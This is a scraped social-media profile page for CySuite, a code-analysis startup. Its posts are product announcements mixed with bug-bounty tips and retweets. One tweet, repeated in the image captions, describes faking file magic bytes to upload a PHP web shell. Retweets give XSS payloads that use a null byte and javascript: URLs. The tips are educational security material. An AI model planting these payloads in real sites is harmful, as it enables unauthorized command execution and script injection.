CySuite

@CySuite_

CySuite is a modern analysis tool for efficient representation, querying, and visualization of source code.

San Francisco, CA

Joined July 2021

4 Following

146 Followers

75 Posts

CySuite @CySuite_

over 3 years ago · San Francisco

CySuite has a new landing page redesign! Join the waitlist today to get early access to the beta version of CySuite. In the beta version, you can link your GitHub repository and visualize a code property graph of the syntax, call stack, and dependencies of your Python program.

CySuite_'s tweet photo. CySuite has a new landing page redesign!

Join the waitlist today to get early access to the beta version of CySuite. In the beta version, you can link your GitHub repository and visualize a code property graph of the syntax, call stack, and dependencies of your Python program. https://t.co/TjVdO3LPOi

0

1

0

0

0

CySuite @CySuite_

over 4 years ago · Islington

Landing page redesign! The homepage has been redesigned to better explain the three main features of CySuite and how it can help your company. We are still in the early stages and would love your feedback. Visit the website at https://t.co/Q2BfLlyNoW

CySuite_'s tweet photo. Landing page redesign!

The homepage has been redesigned to better explain the three main features of CySuite and how it can help your company. We are still in the early stages and would love your feedback.

Visit the website at https://t.co/Q2BfLlyNoW https://t.co/NbxiFAaUCE

0

0

0

0

0

CySuite @CySuite_

over 4 years ago

@_JohnHammond 😂😂😂 right click, save as PNG

1

1

0

0

0

CySuite @CySuite_

over 4 years ago · Berlin

@an0nud4y @harshbothra_ @remonsec @Farah_Hawaa @theXSSrat @InsiderPhD @rbhichher @RogueSMG @joehelle @_JohnHammond @ADITYASHENDE17 @thecybermentor @cyph3r_asr Joplin is a nice shout

0

2

0

0

0

Who to follow

ᴀʙᴅᴇʟʀʜᴍᴀɴ ᴢᴀʏᴇᴅ

Security Engineer | Hacking Systems Before Hackers Do | OSCP+ · eWPTX · eMAPT

Verified account

@thehacktivator

Bug Bounty Hunter | YouTube Content Creator @BePracticalTech

AppSec Researcher @pdiscoveryio

CySuite @CySuite_

over 4 years ago · Berlin

Would you prefer: A: Access to an API that queries for subdomains, directories and parameters (to integrate to your workflow) B: A local software that lets you scan web targets for subdomains, directories and parameters manually (like Burp) #infosec #BugBounty #CyberSecurity

0

0

0

0

0

CySuite_ retweeted

Somdev Sangwan @s0md3v

almost 5 years ago

Hackers, what's a problem that you wish a program could solve? simple, complex, niche - doesn't matter. Looking for something to code tonight 😎🤙

24

104

9

6

0

CySuite @CySuite_

almost 5 years ago

Just landed in Berlin.

CySuite_'s tweet photo. Just landed in Berlin. https://t.co/9W8OgMStsf

0

1

0

0

0

CySuite @CySuite_

almost 5 years ago

What comes first when you put the letter 'G' in the search bar.

0

0

0

0

0

CySuite @CySuite_

almost 5 years ago

@luoy85 Do you mean encoding the payload into the image? @luoy85

2

0

0

0

0

CySuite @CySuite_

almost 5 years ago

File Upload techniques: 1. Change magic bytes (used to identify file): PNG: 89 50 4E 47 0D 0A 1A 0A Zip File: 50 4B 03 04 JPEG: FF D8 FF EE BMP: 42 4D 2. Send payload (Injected using BurpSuite) <?php system($_GET['cmd']); ?> Follow for more #infosec updates and #bugbountytips

CySuite_'s tweet photo. File Upload techniques:
1. Change magic bytes (used to identify file):

PNG: 89 50 4E 47 0D 0A 1A 0A
Zip File: 50 4B 03 04
JPEG: FF D8 FF EE
BMP: 42 4D

2. Send payload
(Injected using BurpSuite)
<?php system($_GET['cmd']); ?>

Follow for more #infosec updates and #bugbountytips https://t.co/pBlhkKUlm6

CySuite_'s tweet photo. File Upload techniques:
1. Change magic bytes (used to identify file):

PNG: 89 50 4E 47 0D 0A 1A 0A
Zip File: 50 4B 03 04
JPEG: FF D8 FF EE
BMP: 42 4D

2. Send payload
(Injected using BurpSuite)
<?php system($_GET['cmd']); ?>

Follow for more #infosec updates and #bugbountytips https://t.co/pBlhkKUlm6

CySuite_'s tweet photo. File Upload techniques:
1. Change magic bytes (used to identify file):

PNG: 89 50 4E 47 0D 0A 1A 0A
Zip File: 50 4B 03 04
JPEG: FF D8 FF EE
BMP: 42 4D

2. Send payload
(Injected using BurpSuite)
<?php system($_GET['cmd']); ?>

Follow for more #infosec updates and #bugbountytips https://t.co/pBlhkKUlm6

1

8

2

5

0

CySuite_ retweeted

Siming Yuan @simingy

almost 5 years ago

simingy's tweet photo. https://t.co/K3bbCUbQtY

60

6K

1K

120

0

CySuite_ retweeted

almost 5 years ago

Eyeopening keynote by @mdowd for those who’ve been ignoring the trends past decade. data-only, crypto and web attacks are taking over mem corruption bugs in multiple domains. Nowadays your offensive team is like a car with 3 wheels if it lacks web or crypto experts.

1

25

7

6

0

CySuite @CySuite_

almost 5 years ago

@AccidentalCISO Why hasn't anyone ever thought of that? 👀

0

1

0

0

0

CySuite @CySuite_

almost 5 years ago

Here are some labs to practice your #CyberSecurity skills categorized by bug type: [XSS] https://t.co/VEueNDVfGN https://t.co/K3EgbqgXNT https://t.co/pPh35u0yC4 https://t.co/5xKObHhAiy https://t.co/6r91gExlY1 https://t.co/KR32PiVzD4 #infosec #BugBounty #bugbountytip

0

3

0

2

0

CySuite_ retweeted

almost 5 years ago

PHP drops any header if it finds nullbyte value in the header. If user controls input in header, they can chose to drop the header. This works on PHP since 2015 but will be fixed on next version. #BugBounty Solution for my CTF: %00<img src=x onerror=alert(1337)>

PaulosYibelo's tweet photo. PHP drops any header if it finds nullbyte value in the header. If user controls input in header, they can chose to drop the header. This works on PHP since 2015 but will be fixed on next version. #BugBounty

Solution for my CTF:
%00<img src=x onerror=alert(1337)> https://t.co/yPVHmE0gq9

6

655

178

98

0

CySuite @CySuite_

almost 5 years ago

This is a really good challenge for beginners. It won't take 30 minutes of your time, and it will increase your problem solving skills. Plus, there are no ranking or timers. Enjoy and good luck!

CySuite_'s tweet photo. This is a really good challenge for beginners. It won't take 30 minutes of your time, and it will increase your problem solving skills.

Plus, there are no ranking or timers. Enjoy and good luck! https://t.co/7qHuYzMLio

Gynvael Coldwind @gynvael

almost 5 years ago

An educational CTF for beginners - no ranking, no scoreboard, no stress :) Enjoy!

5

268

65

50

0

0

9

4

3

0

CySuite_ retweeted

Google VRP (Google Bug Hunters)

almost 5 years ago

Google CTF Beginners Quest 2021 is on! https://t.co/dBiEIG8lIb?!:) Go! Now! You have the fate of the world in your hands!

24

734

236

145

0

CySuite_ retweeted

almost 5 years ago

Bug Bounty Tip Where to inject javascript:alert(1) 🔹 <a href=[xss]> 🔹 <iframe src=[xss]> 🔹 <form action=[xss]> 🔹 <form><button formaction=[xss]> Firefox Only 🔸 <embed src=[xss]> #BugBounty #bugbountytip #infosec #CyberSecurity #cybersecuritytips #Hacking #hacker #hack

0

113

52

22

0

CySuite_ retweeted

Askar @askarali

almost 5 years ago

Anyone doing the same? :D @nixcraft

63

2K

330

40

0

CySuite @CySuite_

almost 5 years ago

@naglinagli @Hacker0x01 Congratulations! Do you have some tips for people who just got their first bounty?

0

2

0

0

0

CySuite @CySuite_

almost 5 years ago

However, adding the Authorization Header to the 403 Forbidden status code won't change the response, because the server understands the request but refuses to authorize it. For example, sending a payload continuously to a server can lead to your IP getting forbidden. #infosec

0

0

0

0

0

CySuite @CySuite_

almost 5 years ago

Your subdomain enumeration scan has just finished and you see two outputs. The first has 200 OK and the other has 401 Unauthorized. Which one do you go for first?

1

0

0

0

0

CySuite @CySuite_

almost 5 years ago

Quick #bugbountytip: The 401 and 403 status codes are two different things. As per the RFC standard, the 401 Unauthorized header indicates that the request has not been applied because it lacks valid credentials for the target resource. Adding an Authorization Header fixes it.

1

1

0

0

0

Last Seen Users on Sotwe

Trends for you

Most Popular Users